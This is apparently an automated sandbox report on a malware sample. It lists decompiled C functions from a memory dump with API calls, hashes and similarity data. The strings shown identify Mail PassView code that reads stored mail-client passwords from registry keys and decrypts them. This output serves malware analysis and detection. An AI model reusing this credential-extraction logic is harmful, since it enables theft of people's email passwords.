                                                                                0x004071b9
                                                                                0x004071be
                                                                                0x004071c3
                                                                                0x004071ca
                                                                                0x004071d2
                                                                                0x004071d7
                                                                                0x004071dc
                                                                                0x004071e9
                                                                                0x00407237
                                                                                0x00407237
                                                                                0x0040723c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407204
                                                                                0x00407209
                                                                                0x0040720e
                                                                                0x0040721c
                                                                                0x00407225
                                                                                0x00407225
                                                                                0x0040722c
                                                                                0x00407232
                                                                                0x00407232
                                                                                0x00407242
                                                                                0x00407242
                                                                                0x00407249

                                                                                APIs
                                                                                  • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                • memset.MSVCRT ref: 004071D7
                                                                                  • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32 ref: 0040EC28
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 00407225
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 00407242
                                                                                Strings
                                                                                • Software\Google\Google Desktop\Mailboxes, xrefs: 004071AF
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Close$EnumOpenmemset
                                                                                • String ID: Software\Google\Google Desktop\Mailboxes
                                                                                • API String ID: 2255314230-2212045309
                                                                                • Opcode ID: 452db49ed067e6e6e63c10348168c8f88923fb1a9b6aea3e0d2cfe22e4762b25
                                                                                • Instruction ID: abca04dfe3767426288f52b4a512d9ce3e2bfadbcd13eaa8a3c626f28e0c8a54
                                                                                • Opcode Fuzzy Hash: 452db49ed067e6e6e63c10348168c8f88923fb1a9b6aea3e0d2cfe22e4762b25
                                                                                • Instruction Fuzzy Hash: A71142728083456BD710EE52DC01EAB7BECEB84344F04093EF995E1191E735E628DAA7
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040B70A, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38registryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040B70A(void* __esi) {
				struct _WNDCLASSA _v44;
				struct HINSTANCE__* _t15;
				struct HWND__* _t20;

				_t15 =  *0x416b94; // 0x400000
				_v44.hInstance = _t15;
				_v44.hIcon =  *((intOrPtr*)(__esi + 0x104));
				_v44.lpszClassName = __esi + 4;
				_v44.style = 0;
				_v44.lpfnWndProc = E004017C1;
				_v44.cbClsExtra = 0;
				_v44.cbWndExtra = 0;
				_v44.hCursor = 0;
				_v44.hbrBackground = 0x10;
				_v44.lpszMenuName = 0;
				RegisterClassA( &_v44);
				_t20 = CreateWindowExA(0, "MailPassView", "Mail PassView", 0xcf0000, 0, 0, 0x280, 0x1e0, 0, 0,  *0x416b94, __esi);
				 *(__esi + 0x108) = _t20;
				return _t20;
			}






                                                                                0x0040b710
                                                                                0x0040b715
                                                                                0x0040b71e
                                                                                0x0040b727
                                                                                0x0040b72e
                                                                                0x0040b731
                                                                                0x0040b738
                                                                                0x0040b73b
                                                                                0x0040b73e
                                                                                0x0040b741
                                                                                0x0040b748
                                                                                0x0040b74b
                                                                                0x0040b776
                                                                                0x0040b77c
                                                                                0x0040b784

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ClassCreateRegisterWindow
                                                                                • String ID: Mail PassView$MailPassView
                                                                                • API String ID: 3469048531-1277648965
                                                                                • Opcode ID: 7d9b3190e156b9bfff027be3e0f607fb910863f17b47cbf685ca248547ef7640
                                                                                • Instruction ID: f223c9819260e0b75888b36d0bfde8daf7ba5992c102a2aca34afaaeb944facf
                                                                                • Opcode Fuzzy Hash: 7d9b3190e156b9bfff027be3e0f607fb910863f17b47cbf685ca248547ef7640
                                                                                • Instruction Fuzzy Hash: 3601ECB5D01248ABDB10CF96CD45ADFFFF8EB99B00F10812AE555F2250D7B46544CB68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401085, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00401085(void* __esi, void* __eflags) {
				struct tagLOGFONTA _v64;
				int _t10;
				long _t11;

				E00406191( &_v64, "MS Sans Serif", 0xa, 1);
				_t10 = CreateFontIndirectA( &_v64);
				 *(__esi + 0x20c) = _t10;
				_t11 = SendDlgItemMessageA( *(__esi + 4), 0x3ec, 0x30, _t10, 0);
				if( *0x417388 != 0) {
					return SendDlgItemMessageA( *(__esi + 4), 0x3ee, 0x30,  *(__esi + 0x20c), 0);
				}
				return _t11;
			}






                                                                                0x00401098
                                                                                0x004010a4
                                                                                0x004010bd
                                                                                0x004010c3
                                                                                0x004010cc
                                                                                0x00000000
                                                                                0x004010e0
                                                                                0x004010e4

                                                                                APIs
                                                                                  • Part of subcall function 00406191: memset.MSVCRT ref: 0040619B
                                                                                  • Part of subcall function 00406191: strcpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,00406269,Arial,0000000E,00000000), ref: 004061DB
                                                                                • CreateFontIndirectA.GDI32(?), ref: 004010A4
                                                                                • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 004010C3
                                                                                • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 004010E0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ItemMessageSend$CreateFontIndirectmemsetstrcpy
                                                                                • String ID: MS Sans Serif
                                                                                • API String ID: 4251605573-168460110
                                                                                • Opcode ID: a5c1b06fa8ac567c51537cce04f23f48b3e0294f7b0701913d9bb68d384747bd
                                                                                • Instruction ID: 11d026e54a5ae2454c64c325e08d9e616df03e05f7163fa19ba200447038793b
                                                                                • Opcode Fuzzy Hash: a5c1b06fa8ac567c51537cce04f23f48b3e0294f7b0701913d9bb68d384747bd
                                                                                • Instruction Fuzzy Hash: 73F0A775A8034877E72167A0ED47F8A7BACAB40B00F10C135FB61B51E1D6F47554DB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040DE43, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040DE43(void** __eax, struct HWND__* _a4) {
				int _t6;
				void** _t10;

				_t10 = __eax;
				if( *0x417510 == 0) {
					memcpy(0x416e70,  *__eax, 0x50);
					memcpy(0x416ba0,  *(_t10 + 4), 0x2cc);
					 *0x417510 = 1;
					_t6 = DialogBoxParamA( *0x416b94, 0x6b, _a4, E0040DB39, 0);
					 *0x417510 =  *0x417510 & 0x00000000;
					 *0x416b9c = _t6;
					return 1;
				} else {
					return 1;
				}
			}





                                                                                0x0040de4b
                                                                                0x0040de4d
                                                                                0x0040de5d
                                                                                0x0040de6f
                                                                                0x0040de8d
                                                                                0x0040de93
                                                                                0x0040de99
                                                                                0x0040dea0
                                                                                0x0040dea8
                                                                                0x0040de4f
                                                                                0x0040de53
                                                                                0x0040de53

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memcpy$DialogParam
                                                                                • String ID: V7
                                                                                • API String ID: 392721444-2959985473
                                                                                • Opcode ID: 5e9eade56f70dddb9201fe9d43162507361263185449feca73d32e9d96fafbc6
                                                                                • Instruction ID: 1a8743d5fef8bbef7923f2c95fec7d45d4f15d0a806a7122114c86eec2fd18b9
                                                                                • Opcode Fuzzy Hash: 5e9eade56f70dddb9201fe9d43162507361263185449feca73d32e9d96fafbc6
                                                                                • Instruction Fuzzy Hash: 93F0A7716843207BD7116F54AC06BC63BF2B704B5AF114926F149E40E1D3F56550CBCC
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004062D1, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 58%
                                                                                			E004062D1(struct HWND__* _a4) {
				void _v259;
				char _v260;
				signed int _t10;

				_v260 = 0;
				memset( &_v259, 0, 0xff);
				GetClassNameA(_a4,  &_v260, 0xff);
				_t10 =  &_v260;
				_push("edit");
				_push(_t10);
				L004115B2();
				asm("sbb eax, eax");
				return  ~_t10 + 1;
			}






                                                                                0x004062ea
                                                                                0x004062f1
                                                                                0x00406304
                                                                                0x0040630a
                                                                                0x00406310
                                                                                0x00406315
                                                                                0x00406316
                                                                                0x0040631f
                                                                                0x00406324

                                                                                APIs
                                                                                • memset.MSVCRT ref: 004062F1
                                                                                • GetClassNameA.USER32(?,00000000,000000FF), ref: 00406304
                                                                                • _stricmp.MSVCRT(00000000,edit), ref: 00406316
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ClassName_stricmpmemset
                                                                                • String ID: edit
                                                                                • API String ID: 3665161774-2167791130
                                                                                • Opcode ID: f6364a9e82c342bcd76c39a965b38e05be617d7d52f0a224c2f99095176bc218
                                                                                • Instruction ID: 6efc07277a00def775dca084f59963aaad452a70fda198cb5006c56c80a8bddd
                                                                                • Opcode Fuzzy Hash: f6364a9e82c342bcd76c39a965b38e05be617d7d52f0a224c2f99095176bc218
                                                                                • Instruction Fuzzy Hash: 75E09BB3C4412A7ADB21A764DC05FE53BAC9F59305F0001B6BD46E10D5E5B497C887A5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040EDAC, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040EDAC() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;

				if( *0x417520 == 0) {
					_t1 = LoadLibraryA("shell32.dll");
					 *0x417520 = _t1;
					if(_t1 != 0) {
						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathA");
						 *0x41751c = _t2;
						return _t2;
					}
				}
				return _t1;
			}





                                                                                0x0040edb3
                                                                                0x0040edba
                                                                                0x0040edc2
                                                                                0x0040edc7
                                                                                0x0040edcf
                                                                                0x0040edd5
                                                                                0x00000000
                                                                                0x0040edd5
                                                                                0x0040edc7
                                                                                0x0040edda

                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(shell32.dll,0040B9D8,73B74DE0,?,00000000), ref: 0040EDBA
                                                                                • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 0040EDCF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: SHGetSpecialFolderPathA$shell32.dll
                                                                                • API String ID: 2574300362-543337301
                                                                                • Opcode ID: 8c8e9a4ff32791e3d6bd34cb9d8ce11c35f1ef255cc83771f6bc322d1b4004da
                                                                                • Instruction ID: 9298da647e7f97f850720a93b521a1101e1548fa407b312faad19db7241a3124
                                                                                • Opcode Fuzzy Hash: 8c8e9a4ff32791e3d6bd34cb9d8ce11c35f1ef255cc83771f6bc322d1b4004da
                                                                                • Instruction Fuzzy Hash: 4BD0C970649202EFC7008F21AE097813ABABB18703F10C537A506E1AA0F7B88190CF5C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040FE05, Relevance: 6.3, APIs: 5, Instructions: 81COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 87%
                                                                                			E0040FE05(intOrPtr* __esi, void* __eflags) {
				void* _t27;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t44;

				_t44 = __esi;
				 *__esi = 0x414288;
				_t27 = E00406549(0x46c, __esi);
				_push(0x20);
				L004115D0();
				if(_t27 == 0) {
					_t28 = 0;
				} else {
					_t28 = E00406A2C(_t27);
				}
				_push(0x20);
				 *((intOrPtr*)(_t44 + 0x450)) = _t28;
				L004115D0();
				if(_t28 == 0) {
					_t29 = 0;
				} else {
					_t29 = E00406A2C(_t28);
				}
				_push(0x14);
				 *((intOrPtr*)(_t44 + 0x454)) = _t29;
				L004115D0();
				if(_t29 == 0) {
					_t29 = 0;
				} else {
					 *((intOrPtr*)(_t29 + 0xc)) = 0;
					 *_t29 = 0;
					 *((intOrPtr*)(_t29 + 4)) = 0;
					 *((intOrPtr*)(_t29 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t29 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t44 + 0x458)) = _t29;
				L004115D0();
				if(_t29 == 0) {
					_t29 = 0;
				} else {
					 *((intOrPtr*)(_t29 + 0xc)) = 0;
					 *_t29 = 0;
					 *((intOrPtr*)(_t29 + 4)) = 0;
					 *((intOrPtr*)(_t29 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t29 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t44 + 0x45c)) = _t29;
				L004115D0();
				if(_t29 == 0) {
					_t29 = 0;
				} else {
					 *((intOrPtr*)(_t29 + 0xc)) = 0;
					 *_t29 = 0;
					 *((intOrPtr*)(_t29 + 4)) = 0;
					 *((intOrPtr*)(_t29 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t29 + 8)) = 0;
				}
				 *((intOrPtr*)(_t44 + 0x460)) = _t29;
				 *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x450)) + 0x14)) = 0x2000;
				 *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x454)) + 0x14)) = 0x2000;
				 *((intOrPtr*)(_t44 + 0x3c)) = 1;
				 *((intOrPtr*)(_t44 + 0x40)) = 1;
				 *((intOrPtr*)(_t44 + 0x44)) = 1;
				 *((intOrPtr*)(_t44 + 0x48)) = 1;
				return _t44;
			}







                                                                                0x0040fe05
                                                                                0x0040fe0d
                                                                                0x0040fe13
                                                                                0x0040fe18
                                                                                0x0040fe1a
                                                                                0x0040fe25
                                                                                0x0040fe2e
                                                                                0x0040fe27
                                                                                0x0040fe27
                                                                                0x0040fe27
                                                                                0x0040fe30
                                                                                0x0040fe32
                                                                                0x0040fe38
                                                                                0x0040fe40
                                                                                0x0040fe49
                                                                                0x0040fe42
                                                                                0x0040fe42
                                                                                0x0040fe42
                                                                                0x0040fe4b
                                                                                0x0040fe4d
                                                                                0x0040fe53
                                                                                0x0040fe60
                                                                                0x0040fe72
                                                                                0x0040fe62
                                                                                0x0040fe62
                                                                                0x0040fe65
                                                                                0x0040fe67
                                                                                0x0040fe6a
                                                                                0x0040fe6d
                                                                                0x0040fe6d
                                                                                0x0040fe74
                                                                                0x0040fe76
                                                                                0x0040fe7c
                                                                                0x0040fe84
                                                                                0x0040fe96
                                                                                0x0040fe86
                                                                                0x0040fe86
                                                                                0x0040fe89
                                                                                0x0040fe8b
                                                                                0x0040fe8e
                                                                                0x0040fe91
                                                                                0x0040fe91
                                                                                0x0040fe98
                                                                                0x0040fe9a
                                                                                0x0040fea0
                                                                                0x0040fea8
                                                                                0x0040feba
                                                                                0x0040feaa
                                                                                0x0040feaa
                                                                                0x0040fead
                                                                                0x0040feaf
                                                                                0x0040feb2
                                                                                0x0040feb5
                                                                                0x0040feb5
                                                                                0x0040fec2
                                                                                0x0040fecd
                                                                                0x0040fed6
                                                                                0x0040fedd
                                                                                0x0040fee0
                                                                                0x0040fee3
                                                                                0x0040fee6
                                                                                0x0040feec

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ??2@$memset
                                                                                • String ID:
                                                                                • API String ID: 1860491036-0
                                                                                • Opcode ID: 7c91cc0c080fd5bb70578688ba928cc39a2670361b6ddd4e2d1e90fb004bc48b
                                                                                • Instruction ID: d938b1c2a289ef47e5423cea375f2860c04713c819a512dfc676868f3ea794ac
                                                                                • Opcode Fuzzy Hash: 7c91cc0c080fd5bb70578688ba928cc39a2670361b6ddd4e2d1e90fb004bc48b
                                                                                • Instruction Fuzzy Hash: CC3146B0A107008FD7609F3AD845666FBE4EF80355F25887FD20ADB6B2E7B8D4448B59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040BD0B, Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040BD0B(void* __edi, void* __esi, void* _a4) {
				signed int _t13;
				signed int _t25;
				int _t26;
				char* _t30;
				void* _t31;
				void* _t33;
				void* _t35;

				_t35 = __esi;
				_t25 = 0x3f;
				_t13 =  *(__esi + 0x10) >> 0x00000003 & _t25;
				_t30 = __esi + 0x18 + _t13;
				 *_t30 = 0x80;
				_t26 = _t25 - _t13;
				_t31 = _t30 + 1;
				if(_t26 >= 8) {
					memset(_t31, 0, _t26 + 0xfffffff8);
				} else {
					memset(_t31, 0, _t26);
					_t33 = __esi + 0x18;
					E0040BD8A(_t33, __esi);
					memset(_t33, 0, 0x38);
				}
				 *((intOrPtr*)(_t35 + 0x50)) =  *((intOrPtr*)(_t35 + 0x10));
				 *((intOrPtr*)(_t35 + 0x54)) =  *((intOrPtr*)(_t35 + 0x14));
				E0040BD8A(_t35 + 0x18, _t35);
				memcpy(_a4, _t35, 0x10);
				return memset(_t35, 0, 4);
			}










                                                                                0x0040bd0b
                                                                                0x0040bd13
                                                                                0x0040bd14
                                                                                0x0040bd16
                                                                                0x0040bd1a
                                                                                0x0040bd1d
                                                                                0x0040bd1f
                                                                                0x0040bd23
                                                                                0x0040bd52
                                                                                0x0040bd25
                                                                                0x0040bd2a
                                                                                0x0040bd2f
                                                                                0x0040bd36
                                                                                0x0040bd40
                                                                                0x0040bd48
                                                                                0x0040bd5d
                                                                                0x0040bd63
                                                                                0x0040bd6b
                                                                                0x0040bd77
                                                                                0x0040bd89

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memset$memcpy
                                                                                • String ID:
                                                                                • API String ID: 368790112-0
                                                                                • Opcode ID: 4c1dce2a3317b4880715cd557b1b90e7212d21989bb675327cb4115bdd69e9ea
                                                                                • Instruction ID: 14e83d3a51f9c3b731822f35bbce0da2433a64988b134a744f8d54487411a0b4
                                                                                • Opcode Fuzzy Hash: 4c1dce2a3317b4880715cd557b1b90e7212d21989bb675327cb4115bdd69e9ea
                                                                                • Instruction Fuzzy Hash: 6F01F5B1680B0026D2356B26CC02F9A77A5AFA0714F000B1EF643666D1D7ACE244869C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040246C, Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040246C(void* __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8, char* _a12, intOrPtr _a16) {
				void _v2058;
				char _v2060;
				char _v2069;
				char _v2070;
				char _v2071;
				char _v2072;
				char _v3086;
				signed char _v3090;
				char _v3091;
				char _v3092;
				char* _v3096;
				char _v3100;
				short* _v3104;
				int _v3108;
				char _v3112;
				void* __ebx;
				void* _t49;
				signed int _t61;
				short* _t76;
				void* _t83;
				signed int _t87;
				void* _t90;

				_t83 = __eax;
				_t73 = 0;
				 *_a12 = 0;
				_v3112 = 0x400;
				_t49 = E0040EBA3(__ecx, _a4, _a8,  &_v3092,  &_v3112);
				_t90 = (_t87 & 0xfffffff8) - 0xc28 + 0x10;
				if(_t49 == 0) {
					_v2069 = 0;
					_v2070 = 0;
					_v2071 = 0;
					_v2072 = 0;
					if(_v3092 != 1) {
						if(_v3092 == 2 &&  *((intOrPtr*)(_t83 + 0xa94)) != 0) {
							_v3100 = _v3112 - 1;
							_v3096 =  &_v3091;
							if(E00404811(_t83 + 0x890,  &_v3100, 0,  &_v3108) != 0) {
								WideCharToMultiByte(0, 0, _v3104, _v3108, _a12, 0x7f, 0, 0);
								LocalFree(_v3104);
							}
						}
					} else {
						if( *((intOrPtr*)(_t83 + 0x888)) != 0) {
							if(_a16 == 0) {
								E0040E988(_a12, _t83 + 0x87c,  &_v3090, 0x7f, 0);
							} else {
								_v2060 = 0;
								memset( &_v2058, 0, 0x800);
								_t90 = _t90 + 0xc;
								_t76 =  &_v2060;
								E0040E988(_t76, _t83 + 0x87c,  &_v3091, 0x400, 1);
								WideCharToMultiByte(0, 0, _t76, 0xffffffff, _a12, 0x7f, 0, 0);
							}
							_t73 = 0;
						}
						_t79 = _a12;
						if( *_a12 == _t73 && _v3112 >= 7 && _v3092 == 1 && _v3091 == 1) {
							_t61 = _v3090 & 0x000000ff;
							if(_t61 > 1 && _v3112 >= _t61 + 6) {
								E00401DFD(_t79,  &_v3086, _t61);
							}
						}
					}
				}
				return 0 |  *_a12 != _t73;
			}

























                                                                                0x0040247a
                                                                                0x0040247f
                                                                                0x00402481
                                                                                0x00402490
                                                                                0x0040249b
                                                                                0x004024a0
                                                                                0x004024a5
                                                                                0x004024b0
                                                                                0x004024b7
                                                                                0x004024be
                                                                                0x004024c5
                                                                                0x004024cc
                                                                                0x0040259e
                                                                                0x004025ad
                                                                                0x004025b5
                                                                                0x004025d1
                                                                                0x004025e4
                                                                                0x004025ee
                                                                                0x004025ee
                                                                                0x004025d1
                                                                                0x004024d2
                                                                                0x004024d8
                                                                                0x004024dd
                                                                                0x00402546
                                                                                0x004024df
                                                                                0x004024ed
                                                                                0x004024f5
                                                                                0x004024fa
                                                                                0x00402510
                                                                                0x00402517
                                                                                0x0040252c
                                                                                0x0040252c
                                                                                0x0040254b
                                                                                0x0040254b
                                                                                0x0040254d
                                                                                0x00402552
                                                                                0x00402575
                                                                                0x0040257d
                                                                                0x0040258f
                                                                                0x00402594
                                                                                0x0040257d
                                                                                0x00402552
                                                                                0x004024cc
                                                                                0x00402603

                                                                                APIs
                                                                                  • Part of subcall function 0040EBA3: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,004024A0,?), ref: 0040EBB9
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 0040252C
                                                                                • memset.MSVCRT ref: 004024F5
                                                                                  • Part of subcall function 0040E988: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040E9A5
                                                                                  • Part of subcall function 0040E988: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 0040E9C6
                                                                                  • Part of subcall function 0040E988: memcpy.MSVCRT ref: 0040EA04
                                                                                  • Part of subcall function 0040E988: CoTaskMemFree.OLE32(00000000,00000000), ref: 0040EA13
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 004025E4
                                                                                • LocalFree.KERNEL32(?), ref: 004025EE
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                • String ID:
                                                                                • API String ID: 3503910906-0
                                                                                • Opcode ID: bb52322aa56186edb046b50904625ef5fe77f2ed0f2dccde0d18aa7e90448571
                                                                                • Instruction ID: 8b275e149f62785490509d2466391155d2af3f8991a5b00387cc308873e1222d
                                                                                • Opcode Fuzzy Hash: bb52322aa56186edb046b50904625ef5fe77f2ed0f2dccde0d18aa7e90448571
                                                                                • Instruction Fuzzy Hash: 7041B4B1408384BFD711DB608D44AEBBBDCBB48308F44493EFA98A21D1D678DA54DB5A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040B3C4, Relevance: 6.1, APIs: 4, Instructions: 115windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 98%
                                                                                			E0040B3C4(intOrPtr __ecx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void _v263;
				char _v264;
				void* __edi;
				void* __esi;
				signed int _t42;
				signed int _t45;
				intOrPtr* _t60;
				signed char _t62;
				intOrPtr _t63;
				int _t65;

				_t61 = __ecx;
				_t60 = _a8;
				_t63 = __ecx;
				_v8 = __ecx;
				if( *(_t60 + 4) == 0x103 &&  *((intOrPtr*)(_t60 + 8)) == 0xfffffff4) {
					_t42 = E00408BA0( *((intOrPtr*)(__ecx + 0x370)), _t60);
					 *((intOrPtr*)(_t63 + 0x10c)) = 1;
					 *(_t63 + 0x110) = _t42;
				}
				if(_a4 == 0x101 &&  *((intOrPtr*)(_t60 + 8)) == 0xfffffffe &&  *((intOrPtr*)(_t60 + 0xc)) == 1) {
					_v264 = 0;
					memset( &_v263, 0, 0xff);
					E00401000(_t61,  &_v264, 0x412440);
					_t42 = E00406523( *((intOrPtr*)(_v8 + 0x108)),  &_v264);
					_t63 = _v8;
				}
				_t65 = 0;
				if( *((intOrPtr*)(_t60 + 8)) == 0xfffffdf8) {
					_t42 = SendMessageA( *(_t63 + 0x118), 0x423, 0, 0);
					if( *_t60 == _t42) {
						_t42 = GetMenuStringA( *(_t63 + 0x11c),  *(_t60 + 4), _t60 + 0x10, 0x4f, 0);
						 *((intOrPtr*)(_t60 + 0x60)) = 0;
					}
				}
				if(_a4 != 0x103) {
					L27:
					return _t42;
				} else {
					_t80 =  *((intOrPtr*)(_t60 + 8)) - 0xfffffffd;
					if( *((intOrPtr*)(_t60 + 8)) == 0xfffffffd) {
						_t42 = E0040AEAA(_t61, _t63, _t63, _t80);
						_t65 = 0;
					}
					if( *((intOrPtr*)(_t60 + 8)) == 0xffffff94) {
						_t42 = E00408ACB( *(_t60 + 0x10), _t61,  *((intOrPtr*)(_t63 + 0x370)), _t65);
						_t65 = 0;
					}
					if( *((intOrPtr*)(_t60 + 8)) != 0xffffff9b) {
						goto L27;
					} else {
						if( *((intOrPtr*)( *((intOrPtr*)(_t63 + 0x370)) + 0x1b8)) == _t65) {
							_t62 = 2;
							_t45 =  *(_t60 + 0x14) & _t62;
							__eflags = _t45;
							if(_t45 == 0) {
								L20:
								__eflags = _t45 - _t62;
								if(_t45 == _t62) {
									L23:
									_t42 = 0;
									__eflags = 0;
									L24:
									if(_t42 == _t65) {
										goto L27;
									}
									_t42 = _t63 + 0x25c;
									if( *_t42 != _t65) {
										goto L27;
									}
									 *_t42 = 1;
									return PostMessageA( *(_t63 + 0x108), 0x402, _t65, _t65);
								}
								__eflags =  *(_t60 + 0x18) & _t62;
								if(( *(_t60 + 0x18) & _t62) == 0) {
									goto L23;
								}
								L22:
								_t42 = 1;
								goto L24;
							}
							__eflags =  *(_t60 + 0x18) & _t62;
							if(( *(_t60 + 0x18) & _t62) == 0) {
								goto L22;
							}
							goto L20;
						}
						asm("sbb eax, eax");
						_t42 =  ~( ~(( *(_t60 + 0x18) ^  *(_t60 + 0x14)) & 0x0000f002));
						goto L24;
					}
				}
			}














                                                                                0x0040b3c4
                                                                                0x0040b3ce
                                                                                0x0040b3da
                                                                                0x0040b3dc
                                                                                0x0040b3df
                                                                                0x0040b3ef
                                                                                0x0040b3f4
                                                                                0x0040b3fe
                                                                                0x0040b3fe
                                                                                0x0040b40b
                                                                                0x0040b427
                                                                                0x0040b42e
                                                                                0x0040b43e
                                                                                0x0040b44f
                                                                                0x0040b454
                                                                                0x0040b457
                                                                                0x0040b45a
                                                                                0x0040b463
                                                                                0x0040b472
                                                                                0x0040b47a
                                                                                0x0040b48c
                                                                                0x0040b492
                                                                                0x0040b492
                                                                                0x0040b47a
                                                                                0x0040b49c
                                                                                0x0040b539
                                                                                0x0040b539
                                                                                0x0040b4a2
                                                                                0x0040b4a2
                                                                                0x0040b4a6
                                                                                0x0040b4aa
                                                                                0x0040b4af
